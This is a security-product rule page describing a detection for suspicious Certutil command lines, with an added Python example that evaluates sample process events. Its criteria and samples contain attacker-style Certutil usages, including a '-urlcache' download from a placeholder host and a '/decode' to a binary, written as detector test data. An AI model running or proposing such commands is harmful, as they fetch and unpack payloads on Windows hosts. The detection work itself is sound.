
Suspicious Certutil Command Execution

Rule added on 30th April, 2024

Rule type:

Correlation

Rule description:

Certutil is a legitimate command-line tool that Microsoft ships with its Windows operating systems. It is used to view, manage, and troubleshoot certificates.

However, attackers may abuse it for malicious activities, such as extracting sensitive information like encryption keys and digital signatures from certificates.

Impact:

It can impact the organizations in the following ways:

  • Privilege Escalation
  • Data exfiltration
  • Malware deployment

Data source:

Windows:

Required configuration: The rule is based on process creation and termination events. The prerequisites are installing and configuring Sysmon, enabling the Audit Process Creation audit policy, and enabling command line auditing so that the command line of each created process is recorded.

Relevant MITRE ATT&CK techniques and tactics:

Tactics: TA0005 - Defense Evasion

Techniques: T1140 - Deobfuscate/Decode Files or Information

Criteria:

((Command line contains certutil AND (Command line contains -URL OR Command line contains /URL OR Command line contains -ping OR Command line contains /pingURL)) OR (Command line contains -decode OR Command line contains /decode OR Command line contains -decodehex OR Command line contains /decodehex OR Command line contains -urlcache OR Command line contains /urlcache OR Command line contains -verifyctl OR Command line contains /verifyctl OR Command line contains -encode OR Command line contains /encode))

'pingURL' or 'ping' - These switches send requests to URLs or hosts to check connectivity, measure response time, and so on.

The use of the 'certutil' command together with these switches may indicate an attempt to interact with remote sources.

'decode', 'decodehex', 'encode', 'urlcache', and 'verifyctl' - These switches perform decoding, encoding, caching, and verification operations. Their use together with 'certutil' may indicate a malicious attempt to manipulate certificates.
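The criteria above, implemented as detection logic over Sysmon-style process-creation events, as an added example that is not part of the original rule page or the vendor's product. It applies the two switch groups exactly as the criteria state them (plain, case-insensitive "contains" matching on "-switch" and "/switch"), returns the indicators that fired so an analyst can see why an event matched, and flags matches from a constructed list of certificate administrators to support the known-false-positive review described further down. The event field names (Image, CommandLine, User), the sample events, hosts, users and paths are all constructed placeholders.

```python
"""Detection logic for the 'Suspicious Certutil Command Execution' rule.

Added example: evaluates Sysmon-style process-creation events (assumed fields
Image, CommandLine, User) against the rule's criteria and reports the
indicators that matched, so the alert carries its own triage context.
"""

from typing import Iterable

# Switch names from the rule's criteria, grouped the way the criteria group them.
# The criteria match either "-name" or "/name"; both prefixes are checked.
REMOTE_SWITCHES = ("url", "ping", "pingurl")
MANIPULATION_SWITCHES = ("decode", "decodehex", "urlcache", "verifyctl", "encode")


def _present_switches(cmdline: str, names: Iterable[str]) -> list:
    """Return the switches from `names` that appear in cmdline with a '-' or '/'
    prefix. This is plain substring matching, mirroring "Command line contains",
    so e.g. "-url" also matches "-urlcache"."""
    lowered = cmdline.lower()
    return [n for n in names if f"-{n}" in lowered or f"/{n}" in lowered]


def evaluate(event: dict) -> dict:
    """Apply the rule's criteria to a single process-creation event.

    Group 1: 'certutil' in the command line AND a remote-interaction switch.
    Group 2: an encode/decode/cache/verify switch. As written on the page, this
             group does not itself require 'certutil' (see usage note).
    """
    cmdline = event.get("CommandLine", "")
    remote = (_present_switches(cmdline, REMOTE_SWITCHES)
              if "certutil" in cmdline.lower() else [])
    manipulation = _present_switches(cmdline, MANIPULATION_SWITCHES)
    return {
        "matched": bool(remote or manipulation),
        "remote_switches": remote,
        "manipulation_switches": manipulation,
    }


def review(events: list, admin_users: Iterable[str] = ()) -> list:
    """Run the rule over a batch of events. Matches from designated certificate
    administrators (the page's known false-positive source) are flagged for
    review rather than suppressed, so no alert is silently dropped."""
    alerts = []
    for ev in events:
        result = evaluate(ev)
        if not result["matched"]:
            continue
        alerts.append({
            "CommandLine": ev.get("CommandLine", ""),
            "User": ev.get("User", ""),
            "indicators": result["remote_switches"] + result["manipulation_switches"],
            "possible_admin_activity": ev.get("User", "") in admin_users,
        })
    return alerts


# Constructed sample events; hostnames, users, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -f http://example.invalid/a.txt a.txt",
     "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe /decode C:\Users\Public\enc.txt C:\Users\Public\out.bin",
     "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r'certutil -ping -config "PKI01\CorpIssuingCA"',
     "User": r"CORP\pkiadmin"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -addstore Root C:\certs\corp-root.cer",
     "User": r"CORP\pkiadmin"},
    {"Image": r"C:\Tools\other.exe",
     "CommandLine": r"other.exe -decode input.txt output.txt",
     "User": r"CORP\jdoe"},
]

if __name__ == "__main__":
    for alert in review(SAMPLE_EVENTS, admin_users={r"CORP\pkiadmin"}):
        print(alert)
```

Running the sample batch yields four alerts: the '-urlcache' event (which fires on both 'url' and 'urlcache' because of substring matching), the '/decode' event, the '-ping' event from the PKI administrator (flagged as possible admin activity), and the non-certutil '-decode' event. That last one shows that the second switch group, taken literally from the criteria, matches any process whose command line carries those switches; when tuning the rule in a SIEM, check whether the platform applies the 'certutil' condition to both groups or only the first. The '-addstore' event does not match, which is worth knowing when triaging certificate-update activity by administrators.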

When to enable this rule:

Enabling this rule will help you meet the security standards' requirements listed below:

Security standards (NIST CSF 2.0):

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you are notified that a suspicious 'certutil' command has been executed. This lets you review who is permitted to run Certutil and put stronger access control measures in place.

Known false positives: This event might be generated by administrators while updating digital certificates on Windows.

Next steps:

When this alert is triggered, the following measures can be implemented:

  • Identification: Determine whether the alert is a new incident or part of an ongoing one.
  • Analysis: Analyze the impact and extent of the compromise to understand the severity of the attack.
  • Response: Respond promptly by initiating an automated workflow to terminate the malicious process.
  • Deploy Access Controls: Implement access controls and permissions to restrict the execution of Certutil by unauthorized users.